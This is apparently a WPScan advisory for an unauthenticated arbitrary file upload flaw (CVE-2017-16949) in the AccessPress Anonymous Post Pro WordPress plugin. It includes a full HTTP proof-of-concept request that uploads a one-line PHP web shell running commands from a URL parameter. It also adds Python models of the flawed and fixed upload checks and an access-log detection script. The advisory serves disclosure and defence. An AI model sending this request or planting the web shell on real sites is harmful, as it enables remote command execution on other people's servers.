AccessPress Anonymous Post Pro < 3.2.0 - Unauthenticated Arbitrary File Upload



Description
The plugin's AJAX upload handler (admin-ajax.php, action ap_file_upload_action) takes the list of allowed file extensions (allowedExtensions[]) and the upload size limit (sizeLimit) from the request itself rather than from the administrator's server-side settings. An attacker can therefore supply their own values, such as allowedExtensions[]=php, and upload any file type and size they want, bypassing the upload filters entirely; the PoC below uploads a PHP web shell this way. The request still has to carry the plugin's upload nonce (shown as [nonce] in the PoC).
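The following is an added illustration of the flaw and of the corresponding fix; it is not the plugin's own code (the plugin is PHP, this is a Python model of the logic). The vulnerable handler lets the request's allowedExtensions[] and sizeLimit values replace the configured policy; the hardened handler ignores client-supplied policy, checks every dotted segment of the filename, and stores the file under a server-chosen name. The settings, size limit, and extension lists below are assumed values, not taken from the plugin.

```python
"""Model of the flaw and its fix (illustrative Python, not the plugin's PHP).

The vulnerable handler lets the request's own allowedExtensions[] and sizeLimit
values replace the administrator's configuration; the hardened handler ignores
client-supplied policy and also rejects executable extensions in any position
of the filename. Settings and limits below are assumed values.
"""
import os
import secrets
from dataclasses import dataclass, field

# Assumed server-side configuration (what an administrator would have set).
SERVER_SETTINGS = {
    "allowed_extensions": {"jpg", "jpeg", "png", "gif", "pdf"},
    "size_limit": 2 * 1024 * 1024,  # 2 MiB
}

# Extensions that typical PHP-on-Apache setups may execute; a file such as
# shell.php.jpg must be rejected even though its final extension is allowed.
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht"}


@dataclass
class Upload:
    filename: str          # client-supplied name, e.g. the multipart filename=
    size: int              # bytes received
    params: dict = field(default_factory=dict)  # query/POST parameters sent by the client


def final_extension(filename: str) -> str:
    return filename.rsplit(".", 1)[-1].lower() if "." in filename else ""


def vulnerable_accept(upload: Upload, settings=SERVER_SETTINGS) -> bool:
    """Flawed logic: values taken from the request override the configuration."""
    allowed = {e.lower() for e in upload.params.get("allowedExtensions[]", settings["allowed_extensions"])}
    limit = int(upload.params.get("sizeLimit", settings["size_limit"]))
    return final_extension(upload.filename) in allowed and upload.size <= limit


def hardened_accept(upload: Upload, settings=SERVER_SETTINGS):
    """Policy comes only from settings. Returns the server-chosen storage name,
    or None when the upload is rejected."""
    name = os.path.basename(upload.filename.replace("\\", "/")).lower()
    parts = name.split(".")
    if len(parts) < 2 or not parts[0]:       # no extension, or a dotfile such as .htaccess
        return None
    ext, inner = parts[-1], parts[1:-1]
    if ext not in settings["allowed_extensions"]:
        return None
    if any(p in EXECUTABLE_EXTENSIONS for p in inner):   # double-extension trick
        return None
    if upload.size > settings["size_limit"]:
        return None
    # Never reuse the client's name: a random name with the validated extension.
    return f"{secrets.token_hex(16)}.{ext}"
```

With the PoC's parameters (allowedExtensions[]=php, sizeLimit=64000) the vulnerable check accepts myshell.php while the hardened check rejects it; the hardened check also refuses shell.php.jpg and .htaccess, which the PoC does not cover but which the same upload endpoint would otherwise be exposed to.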
Proof of Concept
POST /wp-admin/admin-ajax.php?action=ap_file_upload_action&file_uploader_nonce=[nonce]&allowedExtensions[]=php&sizeLimit=64000 HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------7230359611602921801124357792
Content-Length: 264
Referer: http://target.com/
Cookie: PHPSESSID=22cj9s25f72jr376ln2a3oj6h6; 
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------7230359611602921801124357792
Content-Disposition: form-data; name="qqfile"; filename="myshell.php"
Content-Type: text/php

<?php echo shell_exec($_GET['e'].' 2>&1'); ?>

-----------------------------7230359611602921801124357792--
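Because the PoC carries its policy overrides in the query string of the POST, they land in the request line of an ordinary web-server access log and can be found without request-body logging. The following detection script is an added example, not part of the advisory; the log lines it scans are constructed samples in Apache combined format, and the IP addresses and nonce value in them are made up.

```python
"""Detection over web-server access logs (added example, not from the advisory).

The PoC passes its policy overrides in the query string of the POST, so they
appear in the request line of an ordinary access log without any body logging.
The log lines below are constructed samples in Apache combined format; the IPs
and the nonce value are made up.
"""
import re
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Parameters a client has no business sending to the upload handler.
OVERRIDE_PARAMS = ("allowedExtensions[]", "sizeLimit")

# Constructed sample log: one PoC-style request, one benign call to the same
# action, one unrelated request.
SAMPLE_LOG = """\
203.0.113.7 - - [19/Dec/2017:10:12:01 +0000] "POST /wp-admin/admin-ajax.php?action=ap_file_upload_action&file_uploader_nonce=0123456789&allowedExtensions[]=php&sizeLimit=64000 HTTP/1.1" 200 61 "http://target.com/" "Mozilla/5.0"
198.51.100.4 - - [19/Dec/2017:10:12:05 +0000] "POST /wp-admin/admin-ajax.php?action=ap_file_upload_action&file_uploader_nonce=0123456789 HTTP/1.1" 200 61 "-" "Mozilla/5.0"
198.51.100.9 - - [19/Dec/2017:10:13:00 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
"""


def inspect(line: str):
    """Return a finding dict for calls to the vulnerable AJAX action, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    if not url.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    qs = parse_qs(url.query, keep_blank_values=True)
    if qs.get("action") != ["ap_file_upload_action"]:
        return None
    overrides = {k: qs[k] for k in OVERRIDE_PARAMS if k in qs}
    # Any client-supplied override is the signal; the status code tells you
    # whether the server accepted it (200 on a vulnerable version).
    severity = "high" if overrides else "info"
    return {"ip": m["ip"], "time": m["ts"], "status": m["status"],
            "overrides": overrides, "severity": severity}


def scan(log_text: str):
    """Run inspect() over every line and keep the findings."""
    return [hit for hit in map(inspect, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Treat this as a signal rather than a complete control: the overrides are visible here only because the PoC sends them in the URL, and an attacker could just as well place them in the POST body if the handler accepts them there, which an access log will not show. The durable fix is updating to 3.2.0.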

Affects Plugin

Fixed in version 3.2.0

References

CVE 2017-16949
PACKETSTORM 145398
URL https://codecanyon.net/item/accesspress-anonymous-post-pro/9160446

Classification

Type UPLOAD
CWE CWE-434

Miscellaneous

Submitter Colette Chamberland
Submitter Website https://defiant.com
Submitter Twitter @cjchamberland
Views 1324
Verified No
WPVDB ID 8977

Timeline

Publicly Published 2017-12-19
Added 2017-12-19
Last Updated 2017-12-19

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.